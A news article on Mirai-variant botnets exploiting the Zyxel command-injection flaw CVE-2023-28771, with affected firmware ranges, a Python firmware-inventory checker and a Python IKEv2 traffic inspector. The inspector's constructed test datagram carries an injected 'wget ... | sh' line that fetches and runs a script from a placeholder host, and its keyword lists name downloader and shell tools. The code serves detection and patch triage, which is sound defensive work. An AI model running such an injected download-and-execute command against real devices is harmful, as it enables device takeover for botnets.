Posted on July 24, 2023 at 5:19 PM
Organizations With Unpatched Flaw On Zyxel Devices Continue To Be Exploited
Zyxel firewall and VPN devices are being attacked through a vulnerability rated 9.8 on the CVSS scale. The flaw was patched months ago, yet a large number of these devices remain unpatched and continue to be exploited. Compromised devices are being recruited into botnets that launch distributed denial-of-service (DDoS) attacks.
Zyxel devices continue to be exploited by hackers
Zyxel released a patch for the security flaw on April 25. Weeks after the patch was released, however, Shadowserver reported that many Zyxel firewalls and VPN gateways were being hit by active hacking campaigns. At the time, Shadowserver warned that anyone running a vulnerable device should assume it had already been compromised.
A recent report by Fortinet warns that the threat to Zyxel devices is far from over. The security company observed a surge in exploitation activity from several threat actor groups in recent weeks.
Fortinet's assessment matches Shadowserver's: the attacks are carried out by variants of the Mirai malware. Mirai variants scan the internet for routers and Internet of Things (IoT) devices with known vulnerabilities and exploit them automatically, so any unpatched device reachable on the relevant port is a target.
When a Mirai variant succeeds, it corrals the device into a botnet that delivers DDoS attacks at massive volumes. Researchers have been urging organizations that have yet to deploy the patch to do so, because the likelihood of exploitation has only increased.
In June, a working exploit module for the flaw was published, giving botnet operators ready-made code to fold into their malware. Although the threat was clear and imminent, a large number of devices still had not received the patch, and exploitation continued to rise.
Cara Lin, a security researcher at Fortinet, noted that malicious activity has increased significantly since the exploit module was published. According to Lin, FortiGuard Labs telemetry shows attack bursts climbing from May onwards.
“We also identified multiple botnets, including Dark.IoT, a variant based on Mirai, as well as another botnet that employs customized DDoS attack methods,” Lin said. The researcher noted that the hackers were exploiting the vulnerability tracked as CVE-2023-28771 to deploy the payload.
CVE-2023-28771 is an unauthenticated command-injection flaw in the way affected Zyxel devices handle Internet Key Exchange version 2 (IKEv2) traffic, and it carries a CVSS severity rating of 9.8. An attacker sends a specially crafted IKEv2 packet to UDP port 500 on the target device, and the device executes the attacker's operating-system commands without any login. Because remote VPN peers connect to IKE on UDP port 500, the vulnerable service is reachable from the internet on any device offering VPN access.
According to Lin, “The presence of exposed vulnerabilities in devices can lead to significant risks. Once an attacker gains control over a vulnerable device, they can incorporate it into their botnet, enabling them to execute additional attacks, such as DDoS. To effectively address this threat, it is crucial to prioritize the application of patches and updates whenever possible.”
Many devices are still exposed to the flaw
Zyxel disclosed the flaw and issued a patch for it at the same time. The vulnerability is present in the default configuration of the manufacturer's firewall and VPN devices, so a device does not need to be unusually configured to be exposed. Once a device is exploited, it is absorbed into a botnet that is used to run DDoS campaigns.
The affected products and firmware are the Zyxel ZyWALL/USG series, firmware versions 4.60 through 4.73; the VPN series, firmware versions 4.60 through 5.35; the USG FLEX series, firmware versions 4.60 through 5.35; and the ATP series, firmware versions 4.60 through 5.35. Administrators should check the exact firmware build on each device against Zyxel's advisory rather than relying on the series name alone.
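As an added example (not from the article or from Zyxel), the following Python script turns those ranges into an inventory check: it parses the firmware strings an administrator would copy from a device or a management console and reports which devices are still inside the affected range. It assumes Zyxel-style version strings such as V5.35(ABUJ.0) or "ZLD V4.73 Patch 1", treats the digit after the model code in parentheses as the patch level (an assumption), and takes the first fixed builds (ZLD V4.73 Patch 1 for ZyWALL/USG, ZLD V5.36 for the other series) from Zyxel's advisory rather than from this article. The sample inventory is constructed.

```python
import re
from typing import Iterable, NamedTuple

# Affected firmware ranges (inclusive) as listed in the article, keyed by product series.
AFFECTED_RANGES = {
    "ZyWALL/USG": ((4, 60), (4, 73)),
    "VPN":        ((4, 60), (5, 35)),
    "USG FLEX":   ((4, 60), (5, 35)),
    "ATP":        ((4, 60), (5, 35)),
}

# Assumption taken from Zyxel's advisory, not from the article: the first fixed build for
# ZyWALL/USG is ZLD V4.73 Patch 1. The other series are fixed from V5.36, which already
# falls outside their affected range above, so no patch-level rule is needed for them.
FIXED_AT_PATCH = {"ZyWALL/USG": ((4, 73), 1)}

# Accepts "4.73", "V4.73", "V4.73(ABIA.0)", "V4.73(ABIA.1)" and "ZLD V4.73 Patch 1".
# Assumption: the digit after the model code in parentheses is the patch level.
VERSION_RE = re.compile(
    r"V?(?P<major>\d+)\.(?P<minor>\d+)"
    r"(?:\((?P<model>[A-Z]+)\.(?P<plevel>\d+)\))?"
    r"(?:\s*Patch\s*(?P<patch>\d+))?",
    re.IGNORECASE,
)


class Firmware(NamedTuple):
    major: int
    minor: int
    patch: int


def parse_version(text: str) -> Firmware:
    """Extract (major, minor, patch) from a Zyxel-style firmware string."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    # Either notation may carry the patch level; take the higher one.
    patch = max(int(m.group("plevel") or 0), int(m.group("patch") or 0))
    return Firmware(int(m.group("major")), int(m.group("minor")), patch)


def is_vulnerable(series: str, version_text: str) -> bool:
    """True if the series/firmware pair is inside the affected range and below the fix."""
    if series not in AFFECTED_RANGES:
        raise ValueError(f"unknown product series: {series!r}")
    fw = parse_version(version_text)
    low, high = AFFECTED_RANGES[series]
    if not (low <= (fw.major, fw.minor) <= high):
        return False
    fixed = FIXED_AT_PATCH.get(series)
    if fixed and (fw.major, fw.minor) == fixed[0] and fw.patch >= fixed[1]:
        return False
    return True


def triage(inventory: Iterable[tuple]) -> list:
    """Return the (hostname, series, version) entries that still need the patch."""
    return [entry for entry in inventory if is_vulnerable(entry[1], entry[2])]


# Constructed sample inventory for demonstration; hostnames and versions are made up.
SAMPLE_INVENTORY = [
    ("fw-branch-01", "USG FLEX", "V5.35(ABUJ.0)"),
    ("fw-branch-02", "USG FLEX", "V5.36(ABUJ.0)"),
    ("fw-legacy-01", "ZyWALL/USG", "V4.73(ABIA.0)"),
    ("fw-legacy-02", "ZyWALL/USG", "ZLD V4.73 Patch 1"),
    ("fw-dc-01", "ATP", "V4.60(ABFW.0)"),
]

if __name__ == "__main__":
    for host, series, ver in triage(SAMPLE_INVENTORY):
        print(f"{host}: {series} {ver} is still exposed to CVE-2023-28771")
```

Versions below 4.60 are reported as not in the listed range, which is all the advisory supports; it does not mean such builds are safe, only that they are not covered by this bulletin.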
According to Lin, attacks exploiting CVE-2023-28771 over the past month came from a number of distinct IP addresses and targeted the command-injection flaw in the handling of Internet Key Exchange packets received by the Zyxel devices. The injected commands rely on standard tools such as curl and wget.
The curl and wget commands download malicious scripts from servers controlled by the attacker, which then install the bot. Dark.IoT is not the only botnet exploiting this flaw: Katana and Rapperbot are abusing it as well, and the actors behind Katana operate a Telegram channel.
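To make the attack surface described above concrete, here is an added example (not code from the article, Fortinet or Zyxel) of a heuristic inspector for datagrams arriving on UDP port 500. It parses the IKEv2 fixed header and payload chain as laid out in RFC 7296 and flags payload data that carries shell metacharacters or downloader commands such as wget and curl, which is the pattern the injected commands follow. The two sample datagrams are constructed for the example: the suspicious one illustrates the pattern, not the real exploit's payload layout, and the metacharacter and keyword lists are assumptions to tune for your own traffic.

```python
import re
import struct

# IKEv2 fixed header (RFC 7296 section 3.1): initiator SPI, responder SPI, next payload,
# version (major/minor nibbles), exchange type, flags, message ID, total length.
IKEV2_HEADER = struct.Struct("!8s8sBBBBII")
IKE_SA_INIT = 34
PAYLOAD_NOTIFY = 41
PAYLOAD_VENDOR_ID = 43
NO_NEXT_PAYLOAD = 0
NAT_DETECTION_SOURCE_IP = 16388

# Heuristic indicators (assumed lists, tune for your environment): command separators and
# substitution syntax, plus the downloaders the article says the botnets rely on.
SHELL_METACHARS = (b";", b"|", b"&", b"`", b"$(")
DOWNLOADER_KEYWORDS = (b"wget", b"curl", b"tftp", b"busybox", b"/bin/sh")
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")


def parse_ikev2(datagram: bytes):
    """Return (exchange type, [(payload type, payload body), ...]) or raise ValueError."""
    if len(datagram) < IKEV2_HEADER.size:
        raise ValueError("shorter than the IKEv2 header")
    _ispi, _rspi, nxt, version, exchange, _flags, _msg_id, length = IKEV2_HEADER.unpack_from(datagram)
    if version >> 4 != 2:
        raise ValueError(f"major version {version >> 4} is not IKEv2")
    if length != len(datagram):
        raise ValueError(f"header length {length} does not match datagram size {len(datagram)}")
    payloads, offset = [], IKEV2_HEADER.size
    while nxt != NO_NEXT_PAYLOAD:          # walk the generic payload headers
        if offset + 4 > len(datagram):
            raise ValueError("truncated generic payload header")
        next_type, _crit, plen = struct.unpack_from("!BBH", datagram, offset)
        if plen < 4 or offset + plen > len(datagram):
            raise ValueError(f"payload {nxt} declares bad length {plen}")
        payloads.append((nxt, datagram[offset + 4:offset + plen]))
        nxt, offset = next_type, offset + plen
    return exchange, payloads


def payload_reasons(ptype: int, body: bytes) -> list:
    """Reasons this payload looks like command injection, or [] if it looks clean."""
    data = body
    if ptype == PAYLOAD_NOTIFY:
        if len(body) < 4:
            return ["notify payload shorter than its fixed header"]
        _proto, spi_size, _ntype = struct.unpack_from("!BBH", body)
        data = body[4 + spi_size:]         # skip protocol ID, SPI size, type and SPI
    reasons = []
    # Only printable runs are examined, so random hash bytes in NAT detection data don't fire.
    for run in PRINTABLE_RUN.findall(data):
        if any(k in run.lower() for k in DOWNLOADER_KEYWORDS):
            reasons.append(f"payload type {ptype}: downloader command in {run!r}")
        elif any(m in run for m in SHELL_METACHARS):
            reasons.append(f"payload type {ptype}: shell metacharacters in {run!r}")
    return reasons


def inspect_datagram(datagram: bytes) -> list:
    """Check one UDP/500 datagram; an empty list means nothing suspicious."""
    try:
        _exchange, payloads = parse_ikev2(datagram)
    except ValueError as err:
        return [f"malformed IKEv2 datagram: {err}"]
    reasons = []
    for ptype, body in payloads:
        reasons.extend(payload_reasons(ptype, body))
    return reasons


def build_ike_sa_init(payloads, initiator_spi=b"\x11" * 8) -> bytes:
    """Assemble a constructed IKE_SA_INIT request from (type, body) pairs for testing."""
    chain = b""
    for i, (ptype, body) in enumerate(payloads):
        next_type = payloads[i + 1][0] if i + 1 < len(payloads) else NO_NEXT_PAYLOAD
        chain += struct.pack("!BBH", next_type, 0, 4 + len(body)) + body
    first = payloads[0][0] if payloads else NO_NEXT_PAYLOAD
    header = IKEV2_HEADER.pack(initiator_spi, b"\x00" * 8, first, 0x20, IKE_SA_INIT,
                               0x08, 0, IKEV2_HEADER.size + len(chain))  # 0x08 = Initiator
    return header + chain


def notify(ntype: int, data: bytes) -> bytes:
    return struct.pack("!BBH", 0, 0, ntype) + data   # protocol ID 0, no SPI


# Constructed samples, not captured traffic. BENIGN carries opaque NAT detection bytes and a
# vendor ID string; SUSPICIOUS carries text in the downloader pattern the article describes.
BENIGN = build_ike_sa_init([
    (PAYLOAD_NOTIFY, notify(NAT_DETECTION_SOURCE_IP, bytes(range(0x80, 0x94)))),
    (PAYLOAD_VENDOR_ID, b"constructed vendor id"),
])
SUSPICIOUS = build_ike_sa_init([
    (PAYLOAD_NOTIFY, notify(NAT_DETECTION_SOURCE_IP,
                            b"x;wget http://192.0.2.10/bot.sh -O- | sh;")),
])

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_datagram(pkt) or "clean")
```

The inspector is a triage aid, not a signature for CVE-2023-28771: a malformed datagram on port 500 and text that looks like a shell pipeline are both worth a second look, but the decisive check is still whether the device is running a patched firmware build.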
These botnets execute their exploits directly on the security devices that guard an organization's network edge. Every successful exploitation is evidence that the patch had not been installed on that device, and organizations still running a vulnerable firmware version should assume the device may already be compromised rather than simply patching and moving on.